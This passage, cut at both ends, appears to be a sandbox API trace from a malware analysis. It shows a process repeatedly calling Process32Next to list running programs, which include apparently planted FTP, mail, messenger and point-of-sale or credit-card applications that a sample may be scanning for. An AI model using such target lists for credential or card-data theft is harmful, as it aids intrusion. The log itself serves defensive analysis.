th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.865] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.867] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.868] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.870] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.873] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.875] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.877] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.880] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0232.882] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.885] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0232.887] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.889] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0232.891] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0232.892] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0232.894] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0232.896] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0232.938] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0232.940] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.941] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.944] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0232.946] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.948] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.949] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.951] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.954] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.955] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0232.957] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0232.958] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0232.960] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0232.962] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0232.963] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0232.965] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0232.966] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0232.970] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0232.971] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0232.973] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0233.014] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0233.017] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0233.019] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0233.022] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0233.024] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0233.026] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0233.031] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0233.033] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0233.035] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0233.058] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0233.061] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0233.064] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0233.066] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0233.069] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0233.109] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0233.113] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0233.115] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0233.119] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0233.122] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0233.125] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0233.127] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0233.130] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0233.133] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0233.136] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0233.138] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0233.141] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0233.169] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0233.173] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0233.175] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.178] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0233.181] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0233.183] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.185] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0233.187] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0233.189] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.192] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.194] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0233.197] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.199] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.209] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0233.213] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0233.215] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0233.218] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0233.220] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0233.223] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0233.225] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0233.228] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0233.231] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0233.233] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 